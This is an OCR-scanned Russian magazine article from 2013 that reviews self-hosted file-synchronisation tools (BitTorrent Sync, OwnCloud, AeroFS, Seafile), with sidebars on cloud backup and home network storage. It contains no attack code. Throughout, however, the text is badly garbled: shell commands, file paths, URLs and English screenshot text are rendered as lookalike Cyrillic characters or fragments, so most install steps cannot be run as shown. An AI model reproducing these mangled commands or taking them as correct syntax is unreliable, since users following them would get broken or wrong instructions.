вать СЖ-код непосредственно с экрана компьюте- 
ра). Все. Не требуется указывать никаких адресов 
сервера — устройства с одним и тем же кодом най- 
дут друг друга автоматически. Для этого использу- 
ется несколько механизмов: поиск в локальной 
сети с помощью широковещательных пакетов, 
пиры могут обмениваться друг с другом инфор- 
мацией о других известных им пирах, пир может 
быть задан статически указанием адреса и порта, 
может быть использована РИТ либо ВИТоггепІ: тре- 
кер-сервер, который пиры уведомляют о своей до- 
ступности и который может быть ими использован 
для проксирования трафика при невозможности 
установить прямое соединение. 

БЕЗОПАСНОСТЬ 

При передаче файлы шифруются (АЕ5-128) 
и не сохраняются на каких-либо устройствах, 
кроме тех, что были авторизованы пользовате- 
лем. Для взаимной аутентификации устройств 
используется ЗВР. Сама компания ВИТоггепІ: хотя 
и имеет доступ к статистике сервиса, но заявля- 
ет, что никакие данные пользователей ей прин- 
ципиально не могут быть доступны. 

СОВМЕСТИМОСТЬ 

Работает под ОЗ X, ѴѴіпсІоѵл/з (начиная с ХР), І_іпих 
(включая платформы АРМ и РоѵѵегРС), РгееВЗй, 
АпбгоісІ, ІОЗ. 

УСТАНОВКА 

Под ІІЬііпШ самое простое — поставить из репо- 
зитория, всего тремя строчками: 

$ зисіо асІс1-ар1:-геро5І1:огу_^і 

рра Ііихроісіо/Ыізупс 
$ зисіо арТ-^еТ ирсіаіе 
$ 5іісІо арі-^еі: _іп5І;а11 Ьіізупс 

При этом нужно учесть, что ВТЗупс будет за- 
пускаться под пользователем гооі и новые фай- 
лы будут создаваться с правами гооТ Проверим: 

$ рз ах|§гер Ызупс 

8413 ? 51 0:04 /изг/ІіЬ/Ызупс/і-' 

Ы:5ѵпс- сІае топ --п осіаето п --с опй^ н 

/е^с/Ь'Езупс/сІеЬсоп-р-сІе ТаиІ'Е . соп/ 

Для настройки синхронизации каталогов не- 
обходимо зайти на страницу бМр://ІосаІІіоз1::8888. 
На ней доступно добавление/удаление катало- 
гов, показывается их размер и статус синхро- 
низации, можно посмотреть секретный код ка- 
талога и сгенерировать его заново (все клиенты 
со старым ключом потеряют к нему доступ). Так- 
же можно задать имя устройства, которое будет 
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отображаться на других клиентах, порт (по умол- 
чанию он выбирается случайным при запуске), 
установить ограничения на скорость загрузки 
и выгрузки, включить ІіРпР и сменить пароль до- 
ступа к веб- интерфейсу. Для других настроек не- 
обходимо заглянуть в конфигурационный файл— 
в ШэипШ лежит здесь: 

$ 5іісіо папо /ебс/Ыгзупс/сІеЬсоп-р-*-' 
сІе-Раи 11: . соп-Р 

Если в него были внесены изменения, сервис 
нужно перезапустить: 

$ Ьбзупс-гезбагі: 

Примеры конфигурационных файлов можно 
посмотреть тут: 

$ І5 / ебс/Ьбаупс/аатрІез/ 

сокпріех. согѵР эітріе . соп-Р <-■ 

изег-пеы. соп-Р изе г-оісі . з’сіое . сопР 

В случае если ВіСТоггеп'І Зупс не может син- 
хронизировать какой-то файл (это можно по- 
нять по тому, что в веб-интерфейсе, несмотря 
на то что устройство подключено к каталогу, 
постоянный объем данных остается несинхро- 
низированным), необходимо заглянуть в жур- 
нал. По умолчанию в Шэипіи его размещение — 
/ѵа г/ 1 і Ь/Ыэу п с/зу п с . I о д . 

Если процесс синхронизации нужно запу- 
скать под текущим пользователем, можно уста- 
новить другой пакет: 

$ біісіо арб -^ еб іпаба іі Ьб зупс-изег 

В этом случае настройки будут доступны (после 
запуска) по адресу Мбр://1осаІ1"і05І::8888. 

Установка ВИТоггепІ Зупс, к примеру, на Ѵ\Ю 
Му Воок І_Іѵе ненамного сложней. Сначала нужно 
загрузить и распаковать архив: 

# тксііг ~/Ьбзупс && с сі ~/Ьбзупс 

# ы§еб Ьббр : //Ьбзупс . зЗ-меЬзібе-из-*- 1 

еазб-І.атагопаѵуз . сот/Ьб5упс_роиегрс .<-■ 



±аг.%2 

# баг -хѵ-Р Ьб5упс_роыегрс 

Создадим дефолтный конфигурационный файл: 

# . /Ьбз уп с --сІитр-5аіпр1е-сопРі§ > 

Ьбзупс . соп-р 

Добавим файл автозапуска: 

# папо /ебс/іпіб .сІ/Ьбзупс 

#! /Ьіп/ 5Іі 

# /ебс/іпіб * сІ/Ьбзупс 

сазе "$Х" іп 

збагб) 

/гооб/Ьбзупс/Ьбзупс --сопЯ§ / гооб /*-> 
Ьбзупс/Ьбзупс . соп-Р 

Л Л 

збор) 

кіііаіі Ьбзупс 
* 

-Д- Л 

И) 

есИо ''1!5а§е; /ебс/іпіб . сі/Ьбзупс _«=< 
{збагб | збор}" 
ехіб 1 

я- * 

1 ) 

езас 

ехіб Ѳ 



Дадим права на выполнение и обновим 
ссылки на скрипт автозапуска: 

# сіітосі 755 /ебс/іпіб . сІ/Ьбзупс 

# ирсіабе-гс.сі Ьбзупс сіе-раиібз 

И стартуем: 

# /ебс/іпіб. еІ/ЬбзУпс 5багб 

Обязательно нужно сменить пароль для до- 
ступа через веб, а лучше запретить веб-доступ 
с помощью конфигурационного файла. 

ВЫВОДЫ 

Поскольку центрального хранилища в ВТЗупс 
нет, все участники равны, и, если две группы 




Чтобы получить доступ к папке, нужно знать секрет 

участников на некоторое время выйдут из син- 
хронизации, потом будет сложно разобраться 
в том, какая из версий основная. 

Синхронизация через НТТР/НТТРЗ не под- 
держивается (в конце концов, это же торрент- 
протокол), поэтому далеко не всегда он сможет 
пройти через сетевые экраны, и в современ- 
ной защищенной корпоративной среде ему 
приходится туго. Нет возможности совмест- 
ного доступа из браузера к файлам/катало- 
гам. Администрирование большого количества 
каталогов и устройств затруднено. Невозмож- 
но дать доступ для синхронизации к каталогу, 
находящемуся внутри уже синхронизируемого 
каталога. 

ЕЩТоггепІ Зупс производит отличное впечат- 
ление профессионально сделанного сервиса 
и прекрасно покрывает задачи синхронизации 
огромных объемов данных между любым коли- 
чеством пользователей при сравнительно не- 
большом числе синхронизируемых каталогов 
и в не очень закрытых сетях. Он удобен в уста- 
новке и использовании и надежен. Но функци- 
онал его строго ограничен, и это решение мо- 
жет оказаться не очень подходящим для более 
сложных задач. 



Оеі зесгеі ог ОН сосіе 



• РиІІ ассезз ЯеасІ опЕу 
АОС\ЮАРРОР204Р1_5М ЕК37ЭѴ241 ОВМ АЗРА 



Зсап 1Ы$ ОР сосіе ѵѵііН уоиг тоЬІІе сіеѵісе іо соппесі 

зупс ІОІСІѲГ5 





ВіІТоггепі 5упс 



Ѵегзіоп 1,1 .70 ( ир Іо сіаіе ) 



АеісІ Роісіег Ргеіѳгепсез 



Рокіег 



/'Йоте/ 



□горЬох 



.'Ноте.'] 



/зНагез/актоЬ-ОІ 



■Йоте/ 



/зИагез/соттоп 



5126 


Соппесіесі сіеѵісез апсі зіаіив 


ЗГіагіпд 


3.3 СВ іп 9067 !іІез 




Зесгеі і ОР 

Л 


338.5 МВ іп 109 




Зесгеі / ОР 

#1 1X1 


644 В іп 3 Іііез 




Зесгеі / ОР 

[#І1Х| 



0.0 кВ. з ир, 0,0 кВ/з оіоѵѵп 



Ву изіпд ХЫз аррИсаІЬп, уои адгее Іо оиг Ргіѵасу Роіісу апсі Тегтз, 



На смартфоне папку можно добавить и так 



Веб-интерфейс ВТ&упс довольно лаконичен 
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ОѵѵпСІоисІ — одна из самых старых, развитых 
и наиболее известных систем. Она распростра- 
няется в исходных кодах и предоставляет очень 
широкий функционал: хранилище файлов с вер- 
сионированием, календарь, задачи, контакты, 
новости, закладки, просмотр документов, музы- 
кальные и фотогалереи, синхронизацию всего 
этого с настольными компьютерами и мобиль- 
ными устройствами, совместный доступ через 
веб, поиск по содержимому файла. Использо- 
вание в качестве внешних хранилищ ОгорЬох, 
РТР, 53, ѴѴеЬОАѴ. Возможность написания соб- 
ственных плагинов. Поддержка УЭАР. Это далеко 
не полный перечень того, что может ОѵѵпСІоисІ. 
Функционально она превосходит многие бес- 
платные сервисы, в том числе предоставляемые 
Соодіе (МаіІ, Саіепсіаг, Сопіасіз, Тазкз, покой- 
ный уже Веабег и другие), но при этом может 
быть полностью развернута в своей сети. Также 
ОѵѵпСІоисІ поддерживает шифрование на сер- 
верной стороне. 

Клиент для синхронизации использует про- 
токол НТТР/НТТР5 и поддерживает прокси, со- 
ответственно, будет работать в большинстве 
корпоративных сетей через сетевые экраны 
и прокси. Конечно, синхронизация будет мед- 
леннее, чем у ВіІТоггепІ Зупс, зато он работает 
практически везде. 

Пользователи могут не только предоставлять 
доступ к файлам и папкам через веб, но и раз- 
давать их зарегистрированным пользователям 
для синхронизации, при этом они будут доступ- 
ны в папке ЗбагесІ. 

К сожалению, не поддерживается синхрони- 
зация между серверами и нет горячего резер- 
вирования из коробки. Можно только сделать 
резервную копию. Хотя в случае отказа сервера 
на клиентских устройствах копии сохранятся, 
в схеме с центральным хранилищем хотелось 
большей надежности, чем дает ручное восста- 
новление из бзкапа при отказе. 

СОВМЕСТИМОСТЬ 

Работает под ѴѴІпбоѵѵз, ОЗ X, І_іпих, ЮЗ, АпсІгоІсІ. 
Сервер можно поднять даже под ОрепѴѴВТ, 
и он заработает (хотя и не быстро) даже на до- 
машнем маршрутизаторе, есть версия для АРМ. 
Поддерживается многими коммерческими се- 
тевыми хранилищами: Ѵ\Ю Му Воок 1_іѵе, ОЫАР, 
Зупоіоду... Официальные клиенты ОѵѵпСІоисІ 
для мобильных устройств платные, но сервер 
поддерживает открытые протоколы (ѴѴеЬЭАѴ, 
СаЮАѴ и так далее), и использовать платный кли- 
ент необязательно. 

Написан ОѵѵпСІоисІ на РНР, и для его развер- 
тывания доступен широкий выбор средств: веб- 
серверы Арасбе, Ыдіпх, УдГШрсІ, базы данных 
50иі:е, МуЗОЦ РозфгеЗОЬ и другие. 

УСТАНОВКА 

Сервер ставится просто (хотя в репозиториях 
ІЗЬипІи 13.04 и есть пакет ОѵѵпСІоисІ, но он ста- 
рой версии). Добавляем ключи: 

$ ы§е1: бііір: //сіоыпіоасі . орепзизе.ог§/<-' 
герозіііогіез/ізѵ : омпСІоисІ : соттипі1:у/.ь-< 

хІ_ІЬип1:и_13 . 04/КеІеазе . кеу 

$ зисіо ар1:-кеу асісі - < Кеіеазе.кеу 
$ зисіо зб -с "есбо ' сІеЬ Ы:1:р://^ 

сіошпіоасі . орепзизе . ог^/герозі'Ьогіез/*-' 
ізѵ : оипСІоисІ : соттипіѣу/хЫЬип1:и_13 . 04/«-< 
Г >> /еѣс/аріі/зоигсез . Іізѣ . сІ/<— • 
оѵѵпсІоисі . Іізі: " 

$ зисіо ар^-ёеі: ирсіаііе 



И ставим: 

$ зисіо арі: - ^еі; іпзііаіі оіл/псіоисі 

Если нужно установить только клиент, то: 

$ зисіо ар~Е-р е~Е іп5І:а11 оѵѵпсіоисі-сііепі: 

Поставили сервер — открыли в браузере 
ббр://ІосаІбоз1:/оѵѵпсІоис1. В окне первого за- 
пуска нужно указать, что будет использоваться 
ЗОЫІе (не рекомендуется, если пользователей 
больше одного, но для пробы вполне подойдет), 
имя-пароль администратора — и вуаля! В кли- 
енте необходимо для начала синхронизации 
указать адрес сервера. 

На самом деле нужно проверить и подпра- 
вить еще несколько параметров. По умолчанию 
РНР ограничен максимальный размер загружае- 
мых файлов. В файле /е{с/рбр5/арасбе2/рбр.іпі 
нужно изменить параметры ирІоасі гпах 'ГіІезіге 
и розімтіахзіге, задав их, скажем, равными 2 
и 2,2 Гб соответственно: 

$ зисіо папо /е±с/рЬр5/арасНе2/рНр.іпі 

# иріоас)_тах_Я1е5І2е = 500 МВ 
ир1оасІ_тах_Я1е5І2е = 2 СВ 

# роз1:_тах_5І2е = 600 МВ 
розі:_тах_5І2е = 2.2 СВ 

И ре стартовать Арасбе: 



$ зисіо зегѵісе арасбе2 гезііагі: 

Проверим, что в настройках Арасбе разреше- 
но использование .біассѳзз и плосігеѵѵпіе; убе- 
димся, что в разделе /ѵаг/ѵѵѵѵѵѵ файла виртуаль- 
ных хостов Арасбе (как правило, /еІс/арасбе2/ 
зііез-епаЬІесі/ООО-сІеІаиіІ:) АІІоѵѵОѵеггісІе установ- 
лен в АП, выполним а2ептосі геѵѵгііе и а2ептос! 
беасіег и рестартнем Арасбе (подробнее см. 
сюо . аІ/а Миаѵх). Веб-сервер стоит переключить 
на работу по НТТР5. 

Для пдіпх тоже есть инструкция (доо. ді/ 
Еікіббх ). 

БЕЗОПАСНОСТЬ 

Данные между клиентом и сервером передают- 
ся по протоколу НТТР5 (если, конечно, он вклю- 
чен). Шифрование файлов, как уже отмечалось, 
поддерживается только на серверной стороне. 

ВЫВОДЫ 

Впечатление сильно портят недоработки и баги. 
Когда клиент после штатного обновления вне- 
запно начинает пересинхронизировать 300 Мб 
файлов или когда ошибка в конфигурации 
внешнего ѴѴеЬОАѴ-хранилища приводит к тому, 
что веб-интерфейс становится полностью не- 
доступен, и единственное средство это испра- 
вить — корректировка базы данных прямыми 
5С!1_-запросами, сложно решиться доверить ему 
действительно ценные данные. 




РшпСІоисІ 




Л 



Новый 







Оепгю Соде - С++ 



Оегпо Соде - С 



□егтто Соде - РНР 



□ егтю Соде - Руі Мо п 
* Оегпо Ішадѳ -ссс 



О п ■, б л и то в л 



НО 



/ Переименовать ^ 



Ѵе гбіэ па <Г Сд- п а і ь -лб щи 



!е$І ▼ 



СкИеІесІ Шее 



Опубл НШВі 



секунд назад 
секунд назад 
секунд назад 
секунд назад 
секунд назад 
секунд назад 



В ОѵѵпСІоисІ очень богатый функционал, и это хорошо заметно по веб -интерфейсу 



оѵѵпСІоис! 



? ѵ- л х 



О Сепегаі 



%(, МеЬлгагк 



СоппесЕе<1 Ео ЬЕЕз://| 



5упс ЗЕаЕиз 

/оѵѵпсіоиі 



А оѵ/пСІоисі 

• ^ ВетоЕе раЕРі! сІіепЕэупс 
,Тюте/^^^^|/о\А/пС[оисІ 



Асісі РоИег... 



Раизе 



Ретоѵе 



ЗЕогаде Цеаде 



0% 



652 МВ оР 499 СВ іп иае. 

Иоіе: 5оте Рокіег5, Іп сіи Эі пд пеЕѵѵогІ- тоипЕегі ог 
зЬагеЭ Ро1с)ег5, тідНЕ Ьаѵе ФРРегепЕ Іі т ЕЬ з . 



ІпРо.. 



АссоипЕ МаіпЕепапсе 



ЕсііЕ ІдпогесІ Рііез 



МосІіРу АссоипЕ 



О С іо 



зе 



Клиент ОѵѵпСІоисІ мало чем отличается оттого же ОгорЬох 










ХАКЕР 11/178/2013 




\А 






АЕВОР8 



АегоРЗ предназначен для синхронизации файлов 
и предоставления к ним общего доступа. Обмен 
данными идет между устройствами напрямую, 
сервер используется для управления и админи- 
стрирования пользователей; поддерживается 
версионирование файлов. 

Попробовать АегоРЗ можно без развертыва- 
ния сервера, воспользовавшись облачным серви- 
сом, который в бесплатной версии поддерживает 
до трех участников (Геаттаіез) и одного внеш- 
него пользователя (соІІаЬогаГог) без ограничений 
на объем (так как файлы не хранятся на сервере) 
и количество устройств на одного пользователя. 

СОВМЕСТИМОСТЬ 

Сервер Теат Зегѵег работает под ѴѴіпсІоѵѵз, І_іпих, 
ОЗ X. 

Клиент АегоРЗ ЭезкГор поддерживает ѴѴіп- 
боѵѵз, 1_іпих, ОЗ X, АпсігоісІ. 



$ з іісіо фк& -і аегорз-іпзііаііег.. сІеЬ 

Затем нужно запустить АегоРЗ (АррІісаГіопз — > 
— Ищете! — ► АегоРЗ). При щелчке правой кнопкой 
мыши на появившейся в трее иконке выпадет 
меню, похожее на меню йгорЬох. В настройках 
можно задать свое имя и имя компьютера, ло- 
кальный каталог для синхронизации, ограничить 
полосу пропускания и так далее. Также с его по- 
мощью можно предоставить общий доступ к ка- 
талогу, указав список почтовых адресов тех, кому 
дается доступ. При нажатии на кнопку «ЫеГѵѵогк 
Оіадпозіісз...» можно просмотреть список ком- 
пьютеров, доступных для данного устройства. 

Есть клиенты для работы в командной строке; 
аегоГз-сІі — демон и аегоГз-зГі — работа в интерак- 
тивном режиме. 

Аналогичная процедура нужна для установки 
сервера: 



БЕЗОПАСНОСТЬ 

По заявлению разработчиков, все данные, пере- 
даваемые между устройствами, шифруются 
с помощью АЕЗ-256-СВС. Файлы не хранятся 
на серверах, хотя могут проксироваться через 
геіау-сервер, если устройствам не удалось уста- 
новить прямое соединение друг с другом. Под- 
робнее здесь: ПНрз://ѵѵѵѵѵу.аегоТ5.сот/5есигі1:у . 



УСТАНОВКА 

Для установки клиента под ІіЬигтШ необходимо 
загрузить беЬ-пакет и установить его; 



$ зисіо сІрк§ -і аего-Рз1:5-іп5І:а11ег . сІеЬ 

Запустим: 

$ аего-рзііз 

В появившемся окне зададим почтовый адрес 
администратора сервера, его пароль и имя сер- 
вера. Выберем, где будем хранить данные, на ло- 
кальном диске или Аплагоп 33. Для локального 
диска укажем папку, в которой будут храниться 
данные, и их вид: с сохранением файловой струк- 
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туры или в сжатом виде. Во втором случае можно 
достичь значительной экономии дискового про- 
странства, но доступ к файлам можно будет по- 
лучить только с помощью утилит, идущих в ком- 
плекте с сервером. 

По завершении начальной настройки сервер 
автоматически синхронизирует локальный ката- 
лог с другими устройствами, идентифицировав 
пользователя АегоРЗ по почтовому адресу, вве- 
денному при настройке. При этом, хотя и установ- 
ленный локально, сервер будет являться частью 
облака АегоРЗ и на него будут распространяться 
ограничения бесплатной версии (три участника 
и один внешний пользователь). 

В системном трее появится точно такая же 
иконка, как у клиента, отличающаяся выпадаю- 
щим меню. В нем будет пункт Мападе Теат, веду- 
щий на страницу администрирования, и не будет 
Раизе зупсіпд 'Гог ап Гюиг и ІпѵіГе а Ггіепб Го АегоРЗ. 

Как и в случае с клиентом, для сервера есть 
варианты для работы из командной строки: 
аегоГзГз-сІі и аегоГзіз-зЬ. 

ВЫВОДЫ 

Если число пользователей, требующих разных 
прав доступа, никогда не превысит трех (число 
устройств, напомним, не ограничено), можно 
присмотреться к ЗеаГіІе поближе — сервис очень 
простой и удобный, хотя и ограниченный по функ- 
циональности. Если же пользователей может 
в перспективе стать больше, то начиная с четырех 
придется платить по 10 долларов в месяц за каж- 
дого (!) участника (число внешних пользователей 
при этом будет неограниченным). 
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Зеаіііе создан китайскими разработчиками 
и распространяется в исходных кодах. Он пози- 
ционируется как средство синхронизации фай- 
лов и совместной работы для команд. 

Зеаіііе, как и ОѵѵпСІоисі, использует цен- 
тральное хранилище, к которому подключают- 
ся клиенты. Серверная часть существует в двух 
редакциях: Ореп Зоигсе и РгоТеззіопаІ. Пользо- 
ватели профессиональной версии, кроме техни- 
ческой поддержки, получают дополнительные 
функции, такие как возможность использо- 
вать Аппагоп 33 в качестве хранилища файлов, 
ѴѴеЬРАѴ, поиск файлов, предварительный про- 
смотр для файлов бос и ррі, масштабирование, 
повышенную доступность и улучшенную инте- 
грацию с почтой. Профессиональная версия до- 
ступна также для персонального использования 
с ограничением до пяти пользователей. 

Кроме синхронизации, Зеаіііе предоставля- 
ет пользователю такие средства, как встроенная 
вики, ведение списков задач, общий доступ к фай- 
лам через веб, онлайн-просмотр файлов с дискус- 
сиями, управление учетными записями и группа- 
ми, поддержка ШАР, обмен сообщениями. 

Зеаіііе основан на модифицированной под 
задачи файловой синхронизации модели Сіі. 
Основным понятием в Зеаіііе является библио- 
тека (аналог Оіі-репозитория), которая соответ- 
ствует группе каталогов. В отличие от СіІ, файлы 
разделяются на блоки для более эффективной 
передачи по сети и хранения. 

Для начала синхронизации нужно загрузить 
библиотеку с сервера к себе на диск. При не- 




У Зеаіііе очень простой веб-интерфейс 




Мдтя 



ЕЬім-Мріійп 



Т-Ч, 



К» ЦЬгі 

I и.1 I Іргідп Пртіідімпі 

4 ііі'іііДч-ц ли 1 1 СІ ■ т 



ІІПІ 



А 



)ІГ I ,ІГ ■ Г ЪГП-» 



135 ЗМР I 1 1 ОСА 



РіГ* 4.ГІ1-ѴІТІ 






Яш 



.14. I 



^ К*п.»П'-*4 
^ ЯгМ-ігІ "V 
Д А(И*н1 ‘«и ^ * и « * « 

Д І.Ьаі , і Л'іѵ гі |‘. ѵі. і'. ІІчС 

Я 



Л' .1 I ' ПЧ(Г4 ІМК. 



иі і и т---* и 



іілі 2 ігшгы. Ын-і 



іыім 



ІіЛТК ІМіь. нклІП 14 

Му ёі оі#& 




б 



обходимости можно создавать подбиблиотеки 
для подкаталогов. Можно не только давать пра- 
ва пользователям и группам на синхронизацию 
библиотек, но и открывать общий доступ через 
веб как к отдельным файлам, так и к каталогам 
с правами только на чтение или и на чтение, 
и на запись. 

В качестве сервера баз данных Зеаіііе может 
использовать ЗОЫГе, МуЗОЦ РозІдгеЗОЦ веб- 
серверы Арасбе и пдіпх. 

Воспользоваться Зеаіііе можно и без уста- 
новки своего сервера — облачный сервис 
Зеасіоиб, построенный на основе Зеаіііе, в бес- 
платном тарифном плане предоставляет 1 Гб 
бесплатного дискового пространства и 5 Гб 
включенного трафика. 

Для оценки возможностей, предоставляе- 
мых Зеаіііе, можно ознакомиться с демоверсией 

( Мірз://зеас1оиб.сс/сІето ). 

СОВМЕСТИМОСТЬ 

Сервер работает под І_іпих (существует специ- 
альная версия для ПазрЬеггу Рі) и ѴѴіпсІоѵѵз. Кли- 
енты для настольных систем есть для ѴѴіпсІоѵѵз 
ХР, 7, Ѵізіа, 1_іпих (как апплеты, так и терминаль- 
ные), Мае 08 X 10. 6+. Мобильные клиенты рабо- 
тают на АпсІгоісІ и іРасІ/іРГіопе, но их функционал 
сейчас очень бедный. 

БЕЗОПАСНОСТЬ 

Библиотеке при создании можно задать пароль, 
с которым она будет зашифрована алгоритмом 
АЕ5-128. Также на основе пароля генерирует- 
ся токен, который будет потом использоваться 
сервером для проверки возможности доступа 
к библиотеке. После задания пароль изменить 
нельзя, можно только создать новую библиоте- 
ку. Дальнейшее шифрование/дешифрование 
файлов с использованием пароля, по утвержде- 
нию авторов, осуществляется только на клиент- 
ской стороне. Обмен между клиентом и серве- 
ром также шифруется АЕ5-128. 



УСТАНОВКА КЛ ИЕНТА 

Зарегистрируемся в сервисе зеасіоисі.сс. 
На странице загрузки выберем версию клиента, 
соответствующую нашей системе. Для ІІЬипІи это 
беЬ-пакет, устанавливаемый обычным способом, 
например: 

$ зисіо -і 5еаШе_1.8.1_атс164 
Запустим: 

$ зеайіе-арріеі: 

При двойном клике на появившейся в трее 
иконке в браузере откроется веб-интерфейс 
клиента с предложением зайти на сайт облач- 
ного сервиса Зеасіоиб, создать библиотеку 
и загрузить ее в локальный каталог. Когда это 
будет сделано, автоматически будет открыт 
веб-интерфейс локального клиента, который 
покажет прогресс загрузки файлов библиотеки. 
После этого файлы будут автоматически синхро- 
низироваться с сервером. 

Если у ѴѴіпсІоѵѵз-клиента предусмотрена воз- 
можность автозапуска, то под Еіпих нужно вруч- 
ную, скажем, добавить запуск апплета в сгоп: 

$ сгопбаЬ -е 

Добавить строку: 

(ЗгеЬооІ: /изг/Ьіп/зеаГіІе-аррІеІ: 

Поэкспериментировав с клиентским прило- 
жением, подключенным к Зеасіоиб, продолжим 
с серверной частью. Для установки сервера не- 
обходимо загрузить архив со страницы ИІІ р:// 

зеаіііе.еот/еп/сіоѵѵпіоасі/ и разархивировать 
его: 

$ тксііг Ьаімеп 

$ тѵ зеаПІе-зегѵег * Наімеп 
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$ сс) Ка іѵѵеп 

$ Іаг -Х2-Р 5еаГі1е-5егѵег__* 

И на всякий случай сохранить архив: 

$ тксііг іпзіаііесі 

$ тѵ аеаЯІе-вегѵег * Іп5іа11ес1 

Установить дополнительные пакеты: 

$ 5іісІо арі-реі ирсіаіе 

$ 5іісі о а р!-§:е1 іпзіаіі ру1Ьоп2.7 

руІІюп-БеІирІооІз руіНоп-зігпрІеззоп «-< 
ру1:Ьоп-ітаёіп§ здІіІеЗ 

Запустить установщик: 

$ ссі зеаііе- зегѵег- * 

$ ./зеіир-зеаіііе. зб 

І иіітіі -п ЗѲ0ѲѲ 



РЕЗЕРВНОЕ КОПИРОВАНИЕ 

Если нет необходимости организовать синхронизацию, а нужен механизм 
для резервных копий, можно взглянуть в сторону СгазНРІап, с помощью кото- 
рого можно настроить бесплатный бэкап, например на компьютер приятеля, 
и наоборот — с его компьютера на твой. СгазИРІап не предоставляет возмож- 
ность развернуть у себя свой сервер, и за резервное копирование в облако 
придется платить. 



АМА20И СІАСІІЕР 

Чуть больше года назад Аплагоп запустила облачный сервис под названием 
ОІасіег (ледник), предназначенный для хранения резервных копий, с крайне 
низкой стоимостью хранения данных (1 цент за гигабайт данных) и большим 
временем доступа к сохраненной на нем информации — несколько часов. 

В целом ОІасіег очень интересный вариант для резервного хранения, однако 
при оценке общих затрат на него следует учитывать, что Амазон взимает 
плату не только за хранение, но и за передачу данных и запросы к хранилищу. 
Для его использования можно применять утилиту зЗзупс, с помощью которой 
настраивается синхронизация в облачное хранилище 53, и уже в нем настроить 
политику переноса данных в ОІасіег. Альтернативой зЗзупс является файловая 
система зЗІз, которая позволяет удаленно смонтировать Риске! 53. 



и ответить на несколько вопросов, подтвердив 
в конце правильность данных: 



ТІііз І5 уоиг сопіе 


іпіогтаііоп : 


Бѳгѵег пате: 


5ерѵер“Пате 


зегѵег ір/сіотаіп: 


192.168.1.1 


I ~ ^ 

бѳрѵѳр ро рі: 


10001 


зеаіііе сіаіа сііг: 


/ б оте/ а 1 у ко 5 б і п /<-< 


Ііаіыеп/зеаіііе-сіаіа 


зеаНе рогі: 


12Ѳ01 


НѣіРБерѵег рор'Е: 


8082 




11 уои аге ОК ыііб 


ІІіезе сопіеигаііоп . 


ргезз [ЕМТЕК] Іо сопііпие. 



Обрати внимание, что адрес/домен должен 
быть именно тем адресом или доменом, по ко- 
торому к нему будут обращаться клиенты. Если 
у твоего сервера есть несколько адресов (при- 
ватный и публичный), работать с ним клиенты 
смогут только по одному из них. 

И еще пара ответов: 

ТИІ5 І5 уоиг асітіп изегпате/раззыогсі 
асітіп изег пате: таі1@сІотаіп . сот 

ас ітіп раззыогсі : ****** 

Іі_уои аге ОК щ іІИ І Незе соп1§ига1іоп, _ 
ргезз [ЕІЧТЕК] Іо с опііпие. 

Для запуска сервера необходимо стартовать 
два сервиса: 

$ . /зеаіііе . зіі зіагі 
$ . /зеаІіиЬ . зіі 5Іаг1 

После запуска сервера все функциии ад- 
министрирования доступны в веб-интерфейсе 
по адресу Р!!р://ІосаІРоз!:8000/. Для входа не- 
обходимо указать почтовый адрес и пароль, 
которые ты раньше ввел при установке. Новые 
пункты 5уз!ет Асітіп и ѴѴогкзрасе в верхней 
строке предоставляют доступ к системному ад- 
министрированию и уже привычному рабочему 
пространству Зеаіііе соответственно. 

Создадим новую библиотеку и загрузим 
ее. В открывшемся веб-интерфейсе локаль- 
ного клиента мы увидим обе библиотеки, 
и с зеасіоиб.сс, и с нашего локального сервера. 

Автоматический запуск можно настроить 
аналогично настройке автозапуска Ві!Тоггеп! 
Зупс под Ѵ\Ю Му Воок 1_іѵе выше. 

Подробнее установка описана в интернете 



ДОМАШНИЕ СЕТЕВЫЕ ХРАНИЛИЩА 

ѴѴО Му Воок І.іѵе и ѴіО Му Воок Ыѵе Оно 

Тем, кто не хочет играть в конструктор и собирать сетевой накопитель само- 
стоятельно, стоит посмотреть на продвигаемые как персональное облачное 
хранилище продукты ѴѴезіегп Оідііаі. 

Му Воок Ыѵе содержит один жесткий диск емкостью 1 , 2, 3 Тб и порт гига- 
битного ЕШегпеІ В накопителе Му Воок І_іѵе Рио находятся два жестких диска 
суммарной емкостью 4, 6, 8 Тб, которые можно либо использовать в нерезер- 
вируемой конфигурации, либо зеркалировать в массив ПАЮ 1 . Кроме того, 
в него добавлен ІіЗВ-порт, которого нет в версии с одним диском. 

Тихий, небольшой, стильно выглядящий, напоминающий дизайном толстую 
(очень) черную книгу. Внутри — процессор АРМ и полнофункциональный 
Ребіап. В Сети можно найти много инструкций по установке и настройке на нем 
многих популярных программ. 

ПазрЬеггу Рі 

С РазрЬеггу Рі нельзя добиться скоростей, доступных настоящим ІЧАЗ’ам и до- 
машним серверам. Для серьезных жестких дисков понадобится дополнитель- 
ное питание, а для подключения будут доступны только ІІЗВ-порты, никаких 
5АТА/е5АТА. Однако у «малинки» есть ощутимое преимущество — ее поддер- 
живают разработчики почти всех описываемых в статье продуктов. В боль- 
шинстве случаев проблем не возникнет и с двумя другими платформами, 
но РазрЬеггу Рі остается явным фаворитом. 

Ееадаіе СоРІех Иеі/Коте 

Решение от 5еада!е — это бренди рованная версия популярного на Западе, 
но почти неизвестного у нас семейства Родоріид, Во многом это похоже на то, 
что предлагает ѴѴезІегп Оідііаі. Версия ІЧе! позволяет установить два фирмен- 
ных диска объемом от 0,5 до 1,5 Тб каждый, версия Ноте поставляется сразу 
с диском и замены не предполагает. Внутри — полноценная МАЗ-платформа 
от МагѵеІ с процессором, работающим на частоте 1,2 ГГц, и 128 Мб памяти. 
Доступен гигабитный Еібегпеі-разъем и один ЬІЗВ-порт. Очень легко перепро- 
шивается на АгсМ Упих, также совместим с последними версиями Ребіап. 



ЗАКЛЮЧЕНИЕ 

Каждый из четырех инструментов синхронизации и совместной работы с фай- 
лами, рассмотренных в статье, имеет положительные и отрицательные стороны. 
Описанные программы не единственные — за рамками обзора остался, к при- 
меру, ЗрагкІеЗИаге, использующий систему контроля версий <3і1. 

Идеального инструмента, к сожалению, среди них нет. Однако можно точно 
сказать, что с их помощью можно избавиться от ОгорЬох-зависимости и раз- 
вернуть собственный приватный сервис с несопоставимо большим объемом 
и за существенно меньшие деньги, не подвергая свои приватные данные ри- 
скам хранения на внешнем хостинге. ОС 




рс гоыЕ 
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Как сделать жизнь в ІѴіпдои/5 проще 



В этой небольшой статье мы поговорим о том, как сделать разные вещи про- 
ще и быстрее. Например, как написать сценарий, позволяющий разложить по 
папкам загруженные файлы, или как создать скриншот и сразу опубликовать 
его в интернете. 




Денис Колисниченко 

сШ5ііаЬ5@дтаіІ.сот 



